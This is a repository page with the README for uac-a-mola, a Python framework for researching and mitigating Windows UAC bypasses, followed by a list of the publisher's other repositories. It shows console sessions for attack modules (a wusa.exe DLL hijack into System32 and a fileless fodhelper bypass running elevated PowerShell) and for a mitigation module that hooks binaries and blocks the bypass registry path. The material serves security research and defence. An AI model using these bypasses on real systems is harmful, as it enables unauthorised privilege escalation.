Telefonica/uac-a-mola Telefonica/uac-a-mola

  • Stars
    star
    107
  • Rank 313,646 (Top 7 %)
  • Language
    Python
  • License
    GNU General Publi...
  • Created almost 7 years ago
  • Updated almost 3 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
Telefonica/uac-a-mola
github

Telefonica

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

uac-a-mola

Installation

To install uac-a-mola you have to perform the following actions:

  1. Download and install python 2.7.x for Windows taking into account your particular infrastructure, you can find the binaries here: https://www.python.org/downloads/
  2. Add the python path to the path enviroment variable. You can do this by carrying out the following steps:
    1. Right click to mycomputer and left click to properties
    2. Left click to Advance system configuration
    3. Lef click to Enviroment Variables
    4. In the system variables box, double left click to Path
    5. Left clicking into New add the following paths:
      • C:\Python27\
      • C:\Python27\scripts\
  3. Download uac-a-mola tool from github by downloading the .zip file or by clonning the repo.
  4. Open the folder uac-a-mola-master with a cmd and execute the following command:
pip install -r requirements.txt

Uac-a-mola is now ready to rock! You can test its functionality by typing:

cd uacamola
python uacamola.py

Tutorial

This is a brief section that explains the use of some of the uac-a-mola modules:

Attack modules

Using the attack modules is something very simple that hardly requires explanation. The only thing you have to do is load the corresponding module in the framework using the load command, you can see the options or input parameters using the show command, with the run command the module is executed:

uac-a-mola> load .\modules\attack\dll_hijacking_wusa.py
[+] Loading module...
[+] Module loaded!
uac-a-mola[dll_hijacking_wusa.py]> show

 Author
 ------
 |_Pablo Gonzalez (pablo@11paths or @pablogonzalezpe)

 Name
 ----
 |_Copy DLL with wusa.exe

 Description
 -----------
 |_It's used for copy a DLL in privilege path (wusa method win7/8/8.1)


 Options (Field = Value)
 -----------------------
 |_name_dll = comctl32.dll (name of DLL)
 |
 |_binary = compmgmtlauncher.exe (Path to the vulnerable binary)
 |
 |_malicious_dll = C:\Users\ieuser\Desktop\uac-a-mola\uacamola\payloads\comctl32\comctl32.dll (Path to a malicious dll)
 |
 |_name_folder = x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2 (Name folder)
 |
 |_destination_path = C:\Windows\System32 (Destination path)


uac-a-mola[dll_hijacking_wusa.py]> run
[+] Running module...
creating path...
SUCCESS: done
copying dll in path...
SUCCESS: done
creating DDF file...
SUCCESS: done
creating CAB file...
SUCCESS: done
launch wusa.exe /extract
SUCCESS: done! got root? :D
removing path...
SUCCESS: done
uac-a-mola[dll_hijacking_wusa.py]>

And other example:

uac-a-mola> load modules\attack\fileless_fodhelper.py
[+] Loading module...
[+] Module loaded!
uac-a-mola[fileless_fodhelper.py]> show

 Author
 ------
 |_Santiago Hernandez Ramos

 Name
 ----
 |_Fileless Fodhelper

 Description
 -----------
 |_Fileless - Fodhelper bypass UAC

 Options (Field = Value)
 -----------------------
 |_instruction = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -C echo mola > c:\pwned.txt (Elevated Code)

uac-a-mola[fileless_fodhelper.py]> set instruction powershell.exe
uac-a-mola[fileless_fodhelper.py]> run
[+] Running module...

Mitigate modules

Using the mitigation methods is also quite simple, but they have a slightly more complex internal structure that will be explained in this section. In relation to its use, the first thing that must be done is to load the available mitigation module:

uac-a-mola> load modules\mitigation\bypass_mitigation.py
[+] Loading module...
[+] Module loaded!
uac-a-mola[bypass_mitigation.py]> show

 Author
 ------
 |_Santiago Hernandez Ramos

 Name
 ----
 |_This module will instrument the binaries selected and detect possible UAC bypasses

 Description
 -----------
 |_Bypass Mitigation

 Options (Field = Value)
 -----------------------
 |_[REQUIRED] password = None (Password for connection)
 |
 |_[REQUIRED] binlist_file = None (File with a list of binaries to hook, one on each line)
 |
 |_port = 5555 (Port for connection)

In this case, we will need to set a password that the agents will use to comunicate with the listener that will be executed in uacamola framework. We can find the agents in the path uacamola/support/agents , opening that files we can see the password:

fodhelper_ag = Agent('fodhelper.exe', 'localhost', 5555, 'uacamola')
fodhelper_ag.send_forbidden("Software\\Classes\\ms-settings\\Shell\\Open\\command")

uacamola will be the password used for authentication and comunication, but we can change it. The other parameter required is a path to a file that contains a list of binaries to monitor, this binaries must have an agent.pyw file in the agents paths.

uac-a-mola[bypass_mitigation.py]> show

 Author
 ------
 |_Santiago Hernandez Ramos

 Name
 ----
 |_This module will instrument the binaries selected and detect possible UAC bypasses

 Description
 -----------
 |_Bypass Mitigation

 Options (Field = Value)
 -----------------------
 |_password = uacamola (Password for connection)
 |
 |_binlist_file = bins.txt (File with a list of binaries to hook, one on each line)
 |
 |_port = 5555 (Port for connection)

uac-a-mola[bypass_mitigation.py]> run
[+] Running module...
[+] Executing the listener...

--- Press ENTER for quit mitigate mode ---

Just filling this fields and executing the run command, uacamola will start monitoring all the activity related to UAC bypass in the binaries that appear in the list. If dangerous activity is detected, it will automatically prune the dangerous branch (of the file system or registry) and it will execute the binary in a secure way. For exiting this mode we just need to press de ENTER key.

Research modules

Write your own modules

Support

Please report any error to [email protected] or just open an issue in GitHub. Your collaboration is appreciated!

Contact

[email protected]

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. WHENEVER YOU MAKE A CONTRIBUTION TO A REPOSITORY CONTAINING NOTICE OF A LICENSE, YOU LICENSE YOUR CONTRIBUTION UNDER THE SAME TERMS, AND YOU AGREE THAT YOU HAVE THE RIGHT TO LICENSE YOUR CONTRIBUTION UNDER THOSE TERMS. IF YOU HAVE A SEPARATE AGREEMENT TO LICENSE YOUR CONTRIBUTIONS UNDER DIFFERENT TERMS, SUCH AS A CONTRIBUTOR LICENSE AGREEMENT, THAT AGREEMENT WILL SUPERSEDE.

More Repositories

1

Eternalblue-Doublepulsar-Metasploit

Module of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar.
Ruby
1,025
star
2

HomePWN

HomePwn - Swiss Army Knife for Pentesting of IoT Devices
Python
827
star
3

ibombshell

Tool to deploy a post-exploitation prompt at any time
Python
308
star
4

prometheus-kafka-adapter

Use Kafka as a remote storage database for Prometheus (remote write only)
Go
285
star
5

ATTPwn

ATTPwn
Python
205
star
6

toolium

Wrapper tool of Selenium and Appium libraries to test web and mobile applications in a single project
Python
108
star
7

on-the-fly

on-the-fly
Python
82
star
8

Telefonica-WannaCry-FileRestorer

Tool to restore some WannaCry files which encryption weren't finish properly
PowerShell
59
star
9

Airdrop-Crazy

Airdrop Crazy
Python
55
star
10

mistica-web

React components library for Telefonica Design System (Mistica)
TypeScript
47
star
11

nginx-canary

nginx with canary release strategy
Lua
45
star
12

level_up

Python
40
star
13

HiddenNetworks-Python

Python
37
star
14

HashCheck

Ideaslocas Repository
Python
36
star
15

USBHiddenNetworks

PowerShell
31
star
16

SDK-SMS-Stack

SDK-SMS-Stack
Java
30
star
17

webview-bridge

Novum JavaScript Bridge
TypeScript
26
star
18

latch-plugin-wordpress

Latch module for WordPress that lets end-users add an extra level of security to their accounts
PHP
24
star
19

TEFstrap

Bootstrap Theme for Telefonica
CSS
23
star
20

latch-plugin-unix

Shell
20
star
21

node-merge-config

Merge multiple configuration sources: JSON and YAML files, directories, environment properties and command-line arguments.
JavaScript
19
star
22

mistica

18
star
23

latch-sdk-python

Python
18
star
24

mistica-design

Mística Design System (only design)
18
star
25

latch-sdk-php

PHP
17
star
26

node-express-logging

Express middleware to log, using a configurable logger, each request and response.
JavaScript
16
star
27

OMLASP

OMLASP (Ideas Locas)
Jupyter Notebook
15
star
28

node-server-terminate

Allow terminating a server in an orderly fashion
JavaScript
15
star
29

seed-golang

Seed for golang projects
Go
14
star
30

WPM-Wordpress-in-Paranoid-Mode

Ruby
13
star
31

mistica-ios

Swift
13
star
32

node-jwt-utils

JSON Web Tokens (JWT) utils.
JavaScript
13
star
33

latch-plugin-joomla

PHP
11
star
34

tweaks

A customizable debug screen to view and edit flags that can be used for development
Kotlin
11
star
35

HoneyBadger

Python
10
star
36

MetaThief

PoC for extracting office files into PDF file metadata
Python
10
star
37

node-express-domaining

Express middleware to automatically create and destroy a domain.
JavaScript
10
star
38

toolium-examples

Set of examples to learn how to use toolium different functionalities
Python
10
star
39

toolium-template

Base project to start using toolium for your testing automation projects
Python
10
star
40

alfalfa

Opinionated startup for node services and applications to remove plumbing and boilerplate
TypeScript
10
star
41

puppet-github-actions-runner

In This Repository you can find a module that will setup all of the files and configuration needed for GitHub Actions runner to work on Linux hosts (Ubuntu, Debian and CentOS).
Ruby
10
star
42

node-http-pooling-agent

HTTP agent with smart socket pool
JavaScript
9
star
43

node-express-tracking

Express middleware to track the request and response storing in the domain the operation, transactionId and correlator.
JavaScript
9
star
44

CrazyToolBox

A web3 utilities toolbox
Python
9
star
45

mistica-icons

Mística Design System Icons library
8
star
46

govice

Golang library to develop a production-like service
Go
8
star
47

mistica-android

Kotlin
7
star
48

luis-cli

Simple command-line interface to interact with Microsoft LUIS APIs.
TypeScript
7
star
49

node-express-metrics

Express middleware to automatically log the metrics traces.
JavaScript
7
star
50

Docker-WPM-Environment

Ruby
6
star
51

latch-sdk-java

Java
6
star
52

latch-sdk-nodejs

NodeJS SDK for latch
JavaScript
6
star
53

node-themible

Themible Module to set up the theme (to customize the web presentation) and locales (for internationalization) of a node.js express application.
JavaScript
6
star
54

language-model-converter

Language model converter yaml <-> json for LUIS
TypeScript
5
star
55

Cube11Paths

Machine Learning authentication system based on a custom Rubik cube.
C
5
star
56

latch-plugin-jira

Latch plugin for Jira
Java
4
star
57

android-nested-scroll-webview

Android WebView implementation for nested scrolling layouts
Java
4
star
58

seed-bot

Seed bot project
TypeScript
4
star
59

clips

Snapshot of the CLIPS rules engine
C
4
star
60

latch-plugin-openLDAP

C
4
star
61

latch-sdk-c

C
4
star
62

latch-sdk-dotnet

C#
3
star
63

LambdaNetwork

Python
3
star
64

x-ray_code

XRayCode
Python
3
star
65

gymnos

A training platform for AI models
Python
3
star
66

msteams-private-messages

Send private messages programmatically in MSTeams
JavaScript
3
star
67

k8s-spa

K8s Static Pod Autoscaler
Rust
3
star
68

helm-charts

Kubernetes applications
Python
3
star
69

java-plainmap

Java library to access elements in a hierarchical map as a simple map
Java
3
star
70

latch-plugin-drupal7

PHP
3
star
71

latch-plugin-dotnet-membership-provider

C#
3
star
72

post-buildkite-plugin

Post jobs recovery buildkite plugin (WIP)
JavaScript
2
star
73

latch-plugin-squirrelmail

PHP
2
star
74

latch-sdk-ruby

Ruby
2
star
75

jwt-bulk-generator

Script to generate JWT tokens and store them in a csv file
JavaScript
2
star
76

latch-plugin-prestashop

PHP
2
star
77

Metaverse-3d-Assets

2
star
78

android-mock-api-server

Kotlin
2
star
79

latch-plugin-jenkins

Latch plugin for Jenkins CI tool
Java
2
star
80

latch-plugin-redmine

Ruby
2
star
81

latch-sdk-powershell

C#
2
star
82

dome9-cli

Dome9 utilities: SDK, CLI & Agile module
Python
2
star
83

latch-plugin-roundcube

PHP
2
star
84

living-app-v2-react-template

Set up a modern Living App by forking.
JavaScript
2
star
85

latch-plugin-open-xchange

Java
2
star
86

latch-plugin-phpBB

JavaScript
2
star
87

latch-plugin-drupal8

PHP
2
star
88

github-pr-comment-buildkite-plugin

buildkite plugin to post a comment in a PR
Shell
2
star
89

XAIoGraphs

XAIoGraphs (eXplainability Articicial Intelligence over Graphs) is an Explicability and Fairness Python library for classification problems with tabulated and discretized data.
Python
2
star
90

iot-utils

IOT operation Utilities & systems management tools - Ansible Scripting Python WinSSH OpenStack VirtualBox MySQL Postgress MongoDB DevOPS Admin
Shell
2
star
91

niji-dashboard-angular

Niji Dashboard 2.x (Angular)
TypeScript
1
star
92

latch-plugin-owncloud

PHP
1
star
93

la-acme-inc

TypeScript
1
star
94

react-code-test

TypeScript
1
star
95

latch-plugin-sugarCRM

PHP
1
star
96

latch-plugin-drupal6

PHP
1
star
97

latch-plugin-dotnetnuke

C#
1
star
98

latch-plugin-WindowsAuthProvider

C
1
star
99

qacdco-performance

QACDCO performance testing framework.
Python
1
star
100

object-storage

Tool to upload and keep objects in a AWS S3 or Azure Blob storage
TypeScript
1
star